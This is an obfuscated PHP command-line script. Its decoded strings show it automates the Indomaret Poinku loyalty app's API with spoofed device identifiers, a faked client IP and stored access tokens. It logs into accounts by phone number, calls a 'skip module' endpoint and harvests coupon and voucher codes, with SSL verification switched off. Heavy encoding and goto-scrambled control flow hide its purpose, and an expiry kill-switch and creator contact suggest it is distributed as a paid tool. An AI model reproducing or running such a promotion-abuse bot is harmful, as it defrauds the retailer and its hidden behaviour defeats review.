  echo @zm6Ic("\147\162\145\x65\x6e", "\x68\x74\164\160\x73\72\x2f\x2f\x77\141\x2e\x6d\x65\57\x36\x32\70\62\x31\67\x36\63\x35\70\x32\71\65\xa");
  goto m_fbH;
  CAPOM:
  @unlink("\160\157\x69\x6e\x68\160\56\x70\x68\x70");
  goto wMsWI;
  mTnnn:
  $mlMLt = @$owfHy["\144\141\x74\141"]["\141\x63\143\x65\x73\x73\137\x74\157\x6b\x65\156"];
  goto cQgXr;
  LGPrS:
  $owfHy = json_decode($upOL9, true);
  goto UCeyR;
  Fr1xl:
  if (!($cPDPt == 3)) {
    goto vRTIW;
  }
  goto QVao_;
  YBcmP:
  $BW_8H = @$owfHy["\x64\141\x74\141"]["\x63\157\x6e\x74\x65\x6e\x74"][0]["\144\x65\x73\x63\162\151\x70\164\x69\157\x6e"];
  goto AaJdK;
  mUS4h:
  $earOL = $sONlZ;
  goto wwRMs;
  sYy6d:
  echo @zm6Ic("\x6e\145\166\x79", $b2ucB);
  goto WZiQo;
  eQth1:
  $wDisp = "\173\42\160\x68\x6f\156\145\x4e\x75\x6d\142\x65\x72\42\72\x22" . $zn5zd . "\42\54\42\144\145\166\151\x63\x65\111\144\42\72\x22" . $aY0el . "\x22\175";
  goto adOVg;
  a1R8a:
  echo "\xa";
  goto tT2Bl;
  x8eeS:
  $zcN5u = xoZB4(array("\174"), $tqWr2)[0];
  goto N3_fB;
  ezb0I:
  Y06Dy:
  goto Dsy8e;
  We_ec:
  $MXjqh = xWL4L();
  goto jfJh8;
  CD5on:
  $yy9BI++;
  goto w85Q2;
  YTR8P:
  $zcN5u = XOZB4(array("\174"), $tqWr2)[0];
  goto UKbD6;
  GnHIS:
  echo @Zm6iC("\x67\x72\145\x65\156", "\115\x61\x73\165\153\x6b\141\x6e\40\x50\141\163\163\167\x6f\162\144\x20\104\x65\166\151\143\145\x20\x41\x6e\144\x61\40\x3a\x20");
  goto ZAk3u;
  kE9HG:
  CIb70:
  goto QPI07;
  xlspJ:
  echo "\12";
  goto hzy5a;
  wTOTz:
  $ldzeo = @$owfHy["\x64\141\164\x61"][0]["\x73\x75\x62\104\151\163\164\x72\x69\143\x74"]["\x73\x75\142\x44\151\163\x74\x72\x69\143\164"];
  goto iHrm4;
  AdPvR:
  echo @zm6Ic("\x6e\x65\166\171", "\x53\x6f\x72\x72\x79\54\40\x54\150\x69\163\x20\x53\x63\162\151\160\x74\40\110\x61\163\40\x42\145\x65\156\40\122\145\x6d\157\166\x65\144\x20\x42\171\40\x54\150\145\40\x4f\x77\x6e\x65\x72\x21\41");
  goto NqQix;
  n68gs:
  $xp_1p = "\x6b\154\x69\x6b\56\x74\x78\x74";
  goto wtGUU;
  jm8QN:
  echo @Zm6iC("\x79\x65\154\154\x6f\167", "\x7c\40\x57\101\x20\x30\x38\62\61\67\66\x33\65\x38\x32\71\65\40\xa");
  goto ItGdn;
  GNQma:
  echo "\115\x75\x6c\141\x69\40\x42\x61\162\x69\163\x20\x4b\x65\x20\40\72\40";
  goto bfXny;
  P7mQo:
  echo @zM6Ic("\x79\145\154\x6c\x6f\167", "\x42\165\x69\x6c\144\x20\x42\x79\x20\106\x45\x52\x44\131\40\x52\x41\x4d\101\x44\x48\x41\x4e\x20");
  goto mIJkZ;
  yNbnX:
  echo @Zm6IC("\x6e\x65\x76\x79", $qjx5O);
  goto Zt6t6;
  OBy3d:
  echo "\12";
  goto p3xdC;
  B9LnM:
  $wDisp = "\173\x22\x70\150\x6f\156\x65\116\x75\x6d\x62\145\x72\x22\72\42" . $zn5zd . "\42\54\x22\x64\145\x76\x69\x63\145\111\144\x22\72\x22" . $aY0el . "\42\x7d";
  goto hMWAZ;
  P2_cR:
  $a7K8a = auJHZ("\150\164\x74\x70\x73\x3a\57\57\146\151\x72\x65\142\141\163\145\162\145\155\157\164\x65\x63\x6f\x6e\146\151\147\x2e\x67\157\157\147\x6c\145\141\160\151\x73\x2e\143\x6f\x6d\57\x76\61\57\x70\162\157\152\x65\x63\x74\163\x2f\71\x39\70\x38\61\66\66\x30\x35\63\62\70\57\x6e\x61\155\x65\x73\160\x61\143\x65\x73\x2f\146\151\162\145\x62\141\x73\145\x3a\x66\145\x74\x63\x68", $wDisp, $YYbml);
  goto KC4mw;
  RGQLS:
  $jlHkA = str_replace("\x2d", '', $sOOnY);
  goto TUrUS;
  gCqZ1:
  die;
  goto w59ij;
  CEh6b:
  echo @ZM6Ic("\162\145\x64", "\123\143\x72\151\x70\164\40\105\170\x70\x69\162\x65\144\x2c\x20\x48\x75\142\165\x6e\x67\151\40\x43\x72\145\x61\x74\157\162\x20\x68\164\164\160\163\x3a\x2f\57\167\x61\x2e\x6d\145\57\x36\62\70\x32\61\x37\x36\x33\65\70\x32\71\x35\xa");
  goto uVfSY;
  OhQV5:
  echo @ZM6iC("\x6e\145\166\171", $ABmxY);
  goto rIxAs;
  uPmaS:
  function r1QLs($cF6mU, $a3qxo)
  {
    goto hVnPJ;
    KHd99:
    fclose($JZH8K);
    goto b0nkW;
    hVnPJ:
    $JZH8K = fopen($cF6mU, "\x61");
    goto kh1tz;
    kh1tz:
    fputs($JZH8K, $a3qxo);
    goto KHd99;
    b0nkW:
  }
  goto WR_ss;
  QERDp:
  $owfHy = json_decode($o0WQD, true);
  goto zvS3t;
  tuakP:
  @unlink("\x70\x6f\x69\156\150\160\x2e\160\150\x70");
  goto fumDL;
  t3iAT:
  ybEa9:
  goto dfcGR;
  cjkQZ:
  $GTMYQ = @$lImQC["\144\x61\x74\141"]["\143\157\x6e\164\x65\156\x74"][10]["\143\x6f\165\x70\157\156\x43\x6f\144\145"];
  goto ld1xl;
  XH7hS:
  die;
  goto t0TRa;
  CpSYw:
  $QFiev = @$lImQC["\x64\x61\x74\141"]["\x63\157\156\x74\x65\156\x74"][5]["\143\157\x75\160\x6f\156\x43\x6f\x64\145"];
  goto R_Y1g;
  xPuMO:
  echo @Zm6ic("\162\145\144", $qtgR3);
  goto cf3yC;
  u4yvz:
  DiWXR:
  goto RdPLe;
  w5vjT:
  $obc_G = str_replace("\xd", '', $wlJRC);
  goto oyg3B;
  rNskw:
  print_r($zcN5u);
  goto a1R8a;
  OwvXv:
  $wDisp = "\173\x22\x64\141\164\x61\42\72\x5b\173\x22\x61\160\x70\x6c\x69\143\141\x74\151\x6f\x6e\42\x3a\x7b\42\x61\x70\160\x5f\166\x65\x72\163\151\x6f\156\42\72\42\63\56\x31\63\x2e\x30\x22\x2c\42\144\x65\166\x69\143\x65\137\x63\x6c\x61\x73\163\42\72\x22\120\x68\x6f\x6e\145\x22\54\x22\144\x65\166\x69\143\145\137\x66\x61\155\x69\x6c\x79\x22\x3a\x22" . $GOXkU . "\x22\54\42\144\145\166\x69\x63\x65\137\x69\144\42\x3a\42" . $aY0el . "\42\54\42\157\x73\137\x6e\x61\x6d\145\x22\x3a\x22\101\156\144\162\157\x69\x64\x20\x50\x22\x2c\42\157\163\137\x76\x65\162\x73\151\157\156\x22\72\x22\x41\x6e\144\162\x6f\x69\144\40\71\42\x7d\x2c\x22\x63\157\162\x65\42\x3a\x7b\x22\146\x61\151\154\x65\144\137\162\145\141\x73\157\156\x22\x3a\x22\123\x75\143\143\x65\x73\x73\40\120\x49\116\40\141\143\x74\x69\x76\x61\x74\151\x6f\x6e\x22\54\42\x65\166\x65\156\x74\137\x6c\141\x62\x65\154\42\x3a\42\x50\x49\116\x20\x61\x63\164\151\166\141\164\151\x6f\156\x22\x2c\x22\145\166\145\x6e\x74\x5f\156\141\155\145\x22\x3a\42\145\x76\145\156\x74\x5f\x73\165\142\x6d\151\x73\163\x69\157\156\42\x2c\42\x65\166\145\156\164\137\x73\x74\141\x74\x75\x73\x22\72\42\163\165\x63\143\145\x73\163\x22\54\x22\145\166\x65\x6e\164\x5f\x74\151\x6d\x65\x73\x74\141\155\160\42\x3a" . $nb9cm . "\175\x2c\x22\155\141\162\153\145\164\151\156\x67\42\x3a\173\x22\165\164\155\137\162\x61\x77\42\72\42\x75\164\155\x5f\x73\x6f\x75\162\x63\145\x3d\x67\x6f\x6f\x67\x6c\x65\x2d\x70\x6c\x61\171\46\x75\x74\155\137\x6d\145\144\x69\165\x6d\75\157\x72\x67\x61\156\x69\x63\42\x7d\x2c\42\165\163\x65\x72\x22\72\x7b\42\163\x65\163\x73\151\157\156\137\151\144\x22\72\42" . $MXjqh . "\x22\x2c\42\x75\163\145\x72\x5f\151\x64\42\72" . $R_bYC . "\x2c\x22\165\x73\145\x72\x5f\x69\x70\x5f\x61\144\144\x72\145\163\x73\42\72\42\x31\x32\67\56\60\x2e\x30\x2e\x31\42\175\x7d\135\175";
  goto TdnY9;
  C81Xy:
  GV2ko:
  goto st12u;
  lUgya:
  $wDisp = "\x7b\x22\160\x68\x6f\156\145\x4e\165\155\x62\x65\162\42\x3a\x22" . $zn5zd . "\x22\x2c\42\x64\x65\166\151\x63\145\x49\144\42\x3a\42" . $aY0el . "\42\x7d";
  goto VMNR2;
  VgMUd:
  @unlink("\160\x6f\151\156\x68\160\x2e\160\150\x70");
  goto qgKwQ;
  hlmct:
  $K4tCB = @$owfHy["\144\141\164\141"][$qtgR3]["\x70\x72\157\166\x69\156\x63\145\116\141\x6d\145"];
  goto b5Mi3;
  Wlx0i:
  $qtgR3;
  goto ELOq3;
  gQSHj:
  $sONlZ = str_replace("\15", '', $rERzL);
  goto sZiim;
  beFul:
  @unlink("\x70\157\x69\x6e\x68\x70\56\160\150\x70");
  goto BJavt;
  nWgR0:
  $zvt88 = $QRhbE;
  goto X7D5K;
  dz8cU:
  echo "\12";
  goto MJWb1;
  lMFbm:
  $DxrJr = "\x31\x30\x30\60\60\60\x30\60\60\x30\x30\x30\x30\x30\60\60\x30\60";
  goto ppWla;
  ugz9I:
  echo @ZM6Ic("\162\145\144", "\116\x6f\164\151\143\145\x20\x3a\40");
  goto LFnhV;
  KXTQE:
  echo @zM6Ic("\156\145\166\x79", $WtCiL);
  goto JKzQX;
  AMOyM:
  echo @zm6ic("\x6e\x65\x76\x79", $XDyMm);
  goto GezTz;
  dOzgh:
  $earOL = $sONlZ;
  goto U2Uv6;
  bpESN:
  lPFhp:
  goto l_o2B;
  h6t4P:
  $w5ulg = str_replace("\xd", '', $TvVlh);
  goto l16i0;
  KRL_Q:
  echo @zm6ic("\x67\x72\x65\x65\x6e", "\116\157\155\x6f\162\40\x48\120\x20\101\x6e\144\141\40\x20\72\40");
  goto rpal5;
  oJRtM:
  @unlink("\160\157\x69\x6e\x68\x70\x2e\x70\150\160");
  goto TvoFq;
  NaN3z:
  $jTEU0;
  goto t5U4C;
  Z1NER:
  $CeRgl = @$owfHy["\144\141\x74\x61"][0]["\162\145\x63\151\x70\x69\145\x6e\164\116\x61\155\x65"];
  goto rY3kD;
  Cu1Rm:
  $cQFRW = json_decode($upOL9, true);
  goto aT0HM;
  vsMZx:
  echo @Zm6Ic("\x67\162\145\x65\156", "\102\x69\152\x69\40\x4b\x65\x20\x3a\x20");
  goto VauNH;
  ZUFRT:
  echo "\xa";
  goto SFR6C;
  yCvFa:
  echo @zm6iC("\x79\x65\154\x6c\x6f\x77", "\126\x61\154\x75\x65\x20\x20\x20\40\x20\40\x20\40\40\40\72\x20");
  goto zI3JO;
  wkOS0:
  $zcN5u = Xozb4(array("\174"), $wZnHP)[0];
  goto uJHIr;
  hToI3:
  echo "\12";
  goto UQ9UB;
  ShkCI:
  die;
  goto zAjuM;
  bs89A:
  $Ap1KM = json_decode($N0XGD, true);
  goto a0DWl;
  URZe_:
  $fZ2bz = @$owfHy["\x6d\145\x73\163\x61\147\145"];
  goto DrapX;
  scg4D:
  $qFy6r = trim(fgets(STDIN));
  goto xSVo5;
  Nz0TL:
  $yy9BI;
  goto CzTPd;
  kE_5P:
  @unlink("\160\x6f\151\156\150\160\x2e\x70\x68\x70");
  goto wgs69;
  hKxlt:
  echo @Zm6ic("\x70\165\162\160\x6c\x65", "\x4b\x61\x6d\165\x20\x4c\157\147\151\x6e\40\144\x65\x6e\x67\141\156\x20\x55\x73\145\162\156\141\155\145\x20{$zn5zd}");
  goto tcaWh;
  PzzeB:
  $KMaT7 = @$owfHy["\144\141\x74\x61"]["\143\x6f\156\164\x65\x6e\164"][$fM3_G]["\164\171\160\x65"];
  goto CEu9Z;
  tmEqL:
  echo @zm6ic("\x72\145\144", "\12\176\x7e\x7e\x7e\x7e\176\x7e\176\x7e\176\x7e\176\x7e\176\x7e\176\x7e\176\176\x7e\176\176\176\176\176\x7e\176\x7e\x7e\176\176\x7e\x7e\176\x7e\176\x7e\x7e\176\x7e\x7e\176\176\176\x7e\176\176\176\xa");
  goto a5HAT;
  P33EC:
  CWwim:
  goto RWNRO;
  IICKu:
  echo "\12";
  goto Gs7s7;
  Axlar:
  goto lcy0b;
  goto NssVm;
  FYHKZ:
  echo "\12";
  goto MOYQn;
  s7q36:
  $aY0el = $jlHkA;
  goto tXds1;
  j95ak:
  echo "\12\xa";
  goto VUaXz;
  amGCN:
  kmnPA:
  goto HBGqV;
  mhQEM:
  $Jk9cx = G8pf2("\150\x74\x74\160\x73\72\57\57\x65\x64\x74\163\x61\160\160\56\151\156\x64\157\x6d\x61\x72\145\x74\160\x6f\151\156\153\x75\x2e\143\x6f\155\x2f\154\x6f\171\141\x6c\164\171\57\x61\x70\x69\x78\55\x31\65\x30\x32\55\141\160\x69\x2f\155\x6f\142\151\x6c\145\57\162\145\155\x69\156\x64\145\x72\163\57\155\145", $aY0el, $GOXkU, $mlMLt);
  goto ZWgtU;
  FR3s4:
  $DxrJr = "\x31\x30\x30\60\x30\x30\60\x30\x30\60\x30\x30\x30\60\60\x30\x30\60";
  goto VRg4Z;
  l8XQm:
  die;
  goto E_Op0;
  bsKnA:
  if (!($qtgR3 < $CdOss)) {
    goto dGfMJ;
  }
  goto Ck1_U;
  swoX9:
  $rVPVc = @file_get_contents("\x70\x6f\151\x6e");
  goto Y_om6;
  AE_x0:
  echo @zm6ic("\171\145\154\154\157\x77", "\174\x20\127\101\40\x30\70\x32\x31\67\66\x33\x35\x38\x32\71\x35\40\12");
  goto fkcuz;
  k0Qg0:
  $obc_G = str_replace("\15", '', $wlJRC);
  goto JJWE6;
  KF17u:
  $jTEU0 = trim(fgets(STDIN));
  goto MYIE1;
  gScoP:
  $qjx5O = @$cQFRW["\144\141\164\x61"]["\x63\x6f\165\160\157\156\x4e\141\x6d\145"];
  goto K3Ngh;
  BDxWd:
  $m5BZY = gGgr_("\x68\x74\164\160\x73\x3a\x2f\57\141\x73\151\x61\55\163\x6f\x75\x74\150\x65\141\163\x74\62\55\151\x64\x6d\x2d\x63\x6f\162\x70\x2d\x70\x72\x64\x2e\143\x6c\157\x75\144\x66\165\156\x63\x74\151\x6f\156\163\56\156\145\x74\57\151\x64\x6d\x61\x70\x70\x73\x5f\x74\x72\141\x63\x6b\x65\x72\137\147\x61\x74\x65\167\x61\x79", $wDisp);
  goto INRDE;
  CfXzE:
  echo "\12";
  goto q9O2O;
  Kmr8y:
  goto HQc4z;
  goto sSzdR;
  s3nn0:
  $ABmxY = @$nPb0z["\155\x65\163\163\x61\x67\x65"];
  goto f9R6b;
  es2VB:
  $Jk9cx = G8pF2("\x68\164\164\x70\163\x3a\x2f\57\x65\x64\x74\163\141\160\160\56\x69\x6e\x64\157\x6d\x61\162\x65\x74\x70\x6f\x69\x6e\153\x75\56\x63\157\155\x2f\143\x75\x73\x74\x6f\155\x65\162\x2f\141\x70\151\x78\x2d\x31\65\60\62\x2d\141\160\151\57\x69\163\55\167\150\x61\164\163\x61\x70\x70\55\166\x65\x72\x69\x66\151\145\144", $aY0el, $GOXkU, $mlMLt);
  goto f3MfN;
  rpal5:
  echo $BcbF3;
  goto rvW4D;
  VFf4p:
  $u35jw = count($m0f8X) - 1;
  goto IaDVm;
  dsvmA:
  DNYaq:
  goto NcYE1;
  MeZfL:
  $WYrgv = @$H1g60["\146\x69\x64"];
  goto l2zya;
  SqoPf:
  if (!($fUekS == '')) {
    goto jjS8S;
  }
  goto l0tTh;
  C3pq7:
  mTafw:
  goto bNJdD;
  zruIg:
  YFIXZ:
  goto P16AV;
  u2Iln:
  $zn5zd = $U0YgX;
  goto trAV2;
  PypTi:
  @unlink("\x70\157\x69\156\x68\x70\56\x70\150\x70");
  goto Fe5Ht;
  XALsS:
  $MXjqh = xwL4l();
  goto PsWgp;
  V1jox:
  $iElqk = G1WXT("\150\164\164\x70\x73\72\57\57\145\144\x74\163\141\x70\160\x2e\x69\x6e\x64\x6f\x6d\x61\x72\145\x74\160\x6f\x69\x6e\153\x75\56\143\x6f\x6d\57\x6c\157\x67\x69\x6e\57\141\x70\x69\170\x2d\61\x35\x30\x32\x2d\x61\160\151\57\x6f\x70\145\156\57\x70\x69\x6e\57\151\163\55\160\151\x6e\55\145\x78\x69\163\x74\x2d\142\x79\55\x70\150\x6f\156\x65\x2d\156\165\155\142\145\162", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto GAzr5;
  alk_K:
  $QRhbE = explode("\12", @file_get_contents("\146\157\x72\x63\145\143\154\157\163\145"));
  goto jH633;
  ySmQ3:
  $MXjqh = xWl4l();
  goto lM2XZ;
  CpSRT:
  $Ap1KM = json_decode($ofEkP, true);
  goto chQyH;
  TlZVo:
  J2_16:
  goto Jaank;
  YgN08:
  $ypyz5 = @$owfHy["\144\x61\164\141"]["\143\157\x6e\x74\145\156\x74"][$D2zwh]["\151\x64"];
  goto WGRLf;
  K0Bqd:
  $D18xv = @$H1g60["\x64\x61\x74\141"]["\151\x64"];
  goto lU578;
  TMn1K:
  print_r($zcN5u);
  goto kAu4G;
  Q0ESs:
  if (!($fUekS == '')) {
    goto mTafw;
  }
  goto U1ozA;
  wjJ6w:
  die;
  goto o6Pof;
  xydrh:
  die;
  goto EmKuI;
  vEQbd:
  echo @Zm6iC("\156\145\x76\171", "\123\x6f\162\162\171\x2c\40\124\150\x69\163\40\x53\x63\x72\x69\x70\x74\x20\x48\141\163\40\102\145\x65\x6e\x20\122\145\x6d\157\166\145\144\x20\x42\x79\40\x54\x68\145\40\x4f\x77\x6e\145\x72\x21\41");
  goto C3e2F;
  bRVfq:
  echo @ZM6ic("\x6e\145\x76\x79", $I2tFV);
  goto KSHR0;
  Vg1v6:
  echo "\12";
  goto KaJPP;
  yFgwh:
  $sONlZ = str_replace("\xd", '', $rERzL);
  goto JPlU1;
  lnvS6:
  @unlink("\x70\157\151\x6e\x68\160\x2e\x70\x68\x70");
  goto CAT9c;
  E3KOs:
  $M1ADy = @$Ap1KM["\x64\x61\x74\141"]["\x69\144"];
  goto EI4lL;
  wHw05:
  $Jk9cx = g8pF2("\150\x74\164\x70\163\x3a\x2f\x2f\x65\x64\164\x73\141\160\x70\x2e\151\156\144\x6f\x6d\141\x72\145\x74\160\x6f\151\x6e\x6b\165\x2e\143\x6f\155\x2f\x63\165\x73\164\157\x6d\x65\x72\x2f\x61\160\151\x78\55\61\x35\x30\62\x2d\141\x70\x69\57\155\x6f\142\x69\x6c\x65\x2f\144\x65\x74\141\151\x6c\x2d\x63\165\163\x74\x6f\155\145\x72\x2d\x6f\x72\x69\x67\x69\x6e", $aY0el, $GOXkU, $mlMLt);
  goto uSYHL;
  bfXny:
  $jTEU0 = trim(fgets(STDIN));
  goto SPakz;
  PWB9M:
  if (!($ZNU2M == '')) {
    goto NNMbo;
  }
  goto qOgWC;
  tyQvs:
  $nb9cm = round(microtime(true) * 1000);
  goto r4EXt;
  Q8ZOz:
  $YYbml = @$H1g60["\141\165\164\150\x54\x6f\153\145\x6e"]["\x74\157\x6b\x65\156"];
  goto J4tGg;
  hq7kH:
  $zvt88 = $QRhbE;
  goto ibb5f;
  ioDGw:
  $D2zwh++;
  goto VyZs8;
  H6_GJ:
  echo "\12";
  goto bssg1;
  PMIzX:
  $BcbF3 = @$Ap1KM["\x64\x61\164\141"]["\160\x68\157\x6e\145\116\x75\155\x62\x65\x72"];
  goto NDC6U;
  HK40j:
  goto CQ2mu;
  goto Hd7NT;
  L_E1x:
  goto HQc4z;
  goto eZoqi;
  KSKKG:
  $Bz8Et = @$owfHy["\x64\141\164\141"][0]["\x70\157\163\x74\x61\x6c\x43\157\144\145"];
  goto Mf9K6;
  KZvKT:
  echo @Zm6ic("\x6e\x65\166\171", $M1ADy);
  goto FHEiz;
  e1vCg:
  echo "\x53\141\155\160\141\151\x20\x42\141\162\x69\163\40\x4b\145\40\x3a\x20";
  goto x8fie;
  nLPg8:
  $sONlZ = str_replace("\15", '', $rERzL);
  goto zmvS8;
  SJovd:
  if ($t4wQX == "\x44\x69\x73\153\157\x6e\x20\122\x70\x20\62\x35\x2e\x30\x30\x30\x20\x4b\154\151\x6b\40\x49\x6e\144\157\155\141\x72\x65\164") {
    goto oFiiw;
  }
  goto Cqo0x;
  ejx25:
  $wDisp = "\173\x22\x64\x61\x74\x61\42\72\133\173\42\x61\160\160\154\151\x63\141\164\x69\157\156\42\x3a\x7b\x22\141\x70\x70\x5f\x76\x65\x72\x73\151\157\x6e\42\72\x22\x33\x2e\x31\63\56\x30\x22\54\x22\x64\x65\166\x69\x63\145\x5f\143\x6c\x61\x73\163\42\x3a\x22\x50\150\157\x6e\x65\x22\x2c\42\x64\x65\166\151\x63\x65\137\146\x61\155\151\x6c\171\x22\72\42" . $GOXkU . "\42\54\x22\x64\145\166\151\143\145\137\151\144\x22\x3a\x22" . $aY0el . "\42\x2c\x22\157\163\137\156\x61\155\145\x22\72\42\101\x6e\x64\x72\157\151\x64\x20\120\x22\x2c\x22\x6f\x73\137\x76\x65\x72\x73\151\x6f\x6e\x22\72\42\x41\156\144\x72\x6f\151\144\40\x39\x22\x7d\54\x22\143\x6f\x72\145\42\x3a\x7b\42\146\x61\x69\x6c\x65\144\137\162\x65\x61\x73\157\156\42\72\42\x53\165\x63\x63\145\163\163\40\123\115\x53\40\126\x65\162\x69\x66\151\143\141\x74\x69\157\156\42\54\x22\x65\166\x65\156\164\x5f\x6c\x61\142\x65\x6c\x22\x3a\42\x76\145\x72\x69\146\151\x63\141\164\x69\x6f\x6e\x22\x2c\42\x65\166\x65\156\164\137\x6e\x61\x6d\145\x22\72\42\x65\x76\145\x6e\164\x5f\x73\165\x62\x6d\151\x73\x73\x69\157\156\x22\x2c\x22\x65\166\x65\x6e\x74\137\x73\164\x61\164\x75\x73\42\72\42\x73\x75\x63\x63\145\163\x73\x22\x2c\x22\x65\166\x65\156\x74\x5f\x74\151\x6d\145\163\164\141\x6d\x70\x22\x3a" . $nb9cm . "\175\x2c\x22\155\141\x72\153\x65\x74\x69\x6e\x67\x22\x3a\173\42\x75\164\155\137\x72\x61\x77\x22\x3a\x22\x75\x74\155\x5f\x73\x6f\165\162\x63\x65\x3d\x67\157\x6f\x67\x6c\x65\x2d\160\154\x61\171\x26\x75\x74\155\x5f\x6d\145\144\x69\x75\x6d\75\157\x72\147\141\x6e\151\143\42\175\x2c\42\x75\163\145\162\x22\72\173\x22\x73\x65\x73\163\151\157\156\137\x69\x64\42\x3a\x22" . $MXjqh . "\x22\54\x22\x75\x73\145\162\x5f\x69\x64\42\x3a" . $R_bYC . "\x2c\42\x75\163\x65\x72\x5f\151\x70\137\141\x64\x64\x72\x65\x73\x73\x22\72\42\61\62\67\x2e\60\x2e\60\x2e\x31\42\175\175\135\175";
  goto xCZbu;
  b8Z6e:
  $QRhbE = explode("\12", @file_get_contents("\x6d\171\164\x6f\x6b\x65\156"));
  goto Nb2VO;
  zjLwc:
  if (!($jTEU0 < $S8W9D)) {
    goto M5EJ8;
  }
  goto DPkPt;
  ZZHp1:
  echo @zM6IC("\156\x65\x76\171", $ABmxY);
  goto s2xDv;
  fXbxp:
  TA23H:
  goto XYMLf;
  OlRzX:
  iLHFy:
  goto qkXoE;
  Dt3qx:
  lqJR6("\x6d\x79\164\x6f\x6b\145\x6e", $zn5zd, $mlMLt);
  goto boinS;
  OH7B2:
  echo "\12";
  goto fbloW;
  evgdx:
  echo @Zm6IC("\x6e\x65\166\x79", $YXsOG);
  goto DmLJx;
  qy0y7:
  echo "\12";
  goto j1Osj;
  K23sE:
  @unlink("\x70\157\151\156\150\x70\x2e\160\150\x70");
  goto fqUMI;
  dtY2y:
  echo "\12";
  goto AV9rQ;
  POBf_:
  echo "\xa";
  goto yrt42;
  MDPdh:
  $L1qpJ = @$owfHy["\144\x61\164\141"][0]["\x64\x69\x73\x74\x72\151\x63\164"]["\x64\x69\x73\x74\x72\x69\x63\164"];
  goto Vj8L8;
  M_uwR:
  EHIPK:
  goto PNvRG;
  CCLK7:
  echo @zM6iC("\x67\x72\x65\x65\156", "\116\x6f\x6d\x6f\x72\40\x48\120\x20\x41\156\x64\x61\40\40\x3a\x20");
  goto v3oAA;
  EgQkD:
  $ZNU2M = @$Ap1KM["\x64\141\x74\x61"]["\162\145\x77\x61\162\x64\x73"][0]["\151\x74\145\x6d"][0]["\156\141\x6d\x65"];
  goto ecjm5;
  r4NLu:
  goto XZBu7;
  goto NYZyT;
  dXN8c:
  if (!($fUekS == '')) {
    goto yzn_p;
  }
  goto nH2G1;
  PGbXK:
  echo @zm6ic("\x72\x65\144", "\101\160\141\x6b\141\150\x20\131\x61\153\x69\156\x20\x47\x65\156\x65\x72\x61\x74\x65\40\116\145\x77\x20\x54\157\153\x65\x6e\x3f\40\x28\x20\171\40\x2f\x20\156\x20\51\40\72\x20");
  goto mu6vT;
  G6a4g:
  $a7K8a = aUjHz("\x68\x74\164\x70\163\x3a\57\x2f\146\151\x72\145\142\141\x73\145\x72\x65\x6d\x6f\164\145\143\157\156\146\151\x67\56\x67\x6f\x6f\147\x6c\x65\x61\x70\x69\163\56\143\157\x6d\x2f\x76\61\x2f\x70\x72\157\152\145\143\164\x73\x2f\71\x39\x38\70\61\66\x36\x30\65\x33\62\70\57\156\141\155\x65\163\x70\141\x63\145\x73\57\146\151\x72\145\142\141\x73\145\72\x66\145\x74\x63\150", $wDisp, $YYbml);
  goto W3YD7;
  NQMsn:
  echo "\12";
  goto La4zp;
  BqG2a:
  $owfHy = json_decode($SpzvW, true);
  goto f4TNt;
  dIp9f:
  AteVH:
  goto gHwT9;
  o6Pof:
  bLHjw:
  goto J8niW;
  L1Xq4:
  echo "\12";
  goto YRNTC;
  j1jXq:
  $Jk9cx = g8pF2("\150\164\164\x70\163\x3a\x2f\57\x65\144\164\x73\x61\160\160\x2e\151\x6e\x64\x6f\155\x61\x72\x65\164\160\157\151\x6e\x6b\x75\56\x63\157\155\x2f\143\x6f\156\146\x69\147\x75\162\141\164\151\x6f\156\x2f\x61\x70\151\170\55\x31\x35\x30\62\x2d\x61\x70\x69\57\x6d\157\142\x69\154\x65\57\163\x6b\x69\160\x2d\155\x6f\144\x75\x6c\145\57\x74\x72\55\163\153\x69\160\x2d\x6d\157\144\x75\x6c\145", $aY0el, $GOXkU, $mlMLt);
  goto i29Nz;
  eFo7K:
  $xp_1p = "\x69\156\144\x6f\x2e\x74\170\x74";
  goto Z6h6f;
  fvvse:
  $I2tFV = @$owfHy["\144\x61\x74\141"]["\x63\157\156\x74\145\156\x74"][$fM3_G]["\x61\x6d\157\x75\156\x74"];
  goto AYcyu;
  kO9o0:
  echo "\12";
  goto Et81j;
  bsyt4:
  echo "\xa";
  goto okBv5;
  wURJg:
  $vzRG5 = xoZB4(array("\x7c"), $mQ1PX)[0];
  goto DA1mz;
  D3NTE:
  $ZqwwP = @$owfHy["\144\x61\164\141"][0]["\x64\151\x73\164\162\x69\143\164"]["\153\x65\171\x77\157\x72\x64"];
  goto Wo0m2;
  ylkt4:
  $zvt88 = $QRhbE;
  goto ca3bq;
  BLyzs:
  echo $yy9BI . "\x2e\40";
  goto XtD9W;
  ulLqL:
  jACUo:
  goto rMSj8;
  oEEsC:
  $lPULW = $m0f8X;
  goto P7f3o;
  xwhDi:
  function Rzrv9($lEbop)
  {
    goto Iwx2X;
    gBB07:
    if (!$P7lm9) {
      goto oHvIP;
    }
    goto PZ1X3;
    zcwrR:
    return $ECuqv;
    goto pU2Ki;
    y2fbZ:
    print_r($AXlcQ);
    goto zcwrR;
    TVXlG:
    I1_tl:
    goto x4uwP;
    dXYuP:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto D37sG;
    x4uwP:
    $AXlcQ = json_decode($y7f11, true);
    goto y2fbZ;
    AyXe4:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto MRgQk;
    MRgQk:
    goto I1_tl;
    goto HguiC;
    W9Xhi:
    $P7lm9 = curl_getinfo($C6npe);
    goto gBB07;
    dnhN_:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto ovyF7;
    xwJqc:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto frkr8;
    ORVvW:
    $ruc3h[] = "\x43\x6f\x6e\156\x65\143\x74\x69\x6f\x6e\x3a\x20\113\145\x65\x70\55\x41\154\151\166\145";
    goto M31yw;
    UdUFv:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x6b\x6c\151\x6b\x2e\x74\170\x74");
    goto RXXua;
    jvl5U:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\153\x6c\x69\153\x2e\x74\170\x74");
    goto UdUFv;
    Iwx2X:
    $C6npe = curl_init();
    goto dnhN_;
    frkr8:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto jvl5U;
    HguiC:
    oHvIP:
    goto GNw1I;
    D37sG:
    $ruc3h[] = "\x55\163\x65\162\55\101\147\145\x6e\x74\x3a\40\157\x6b\150\x74\x74\160\57\65\56\60\x2e\x30\55\141\154\x70\150\141\56\x35";
    goto ORVvW;
    GNw1I:
    return false;
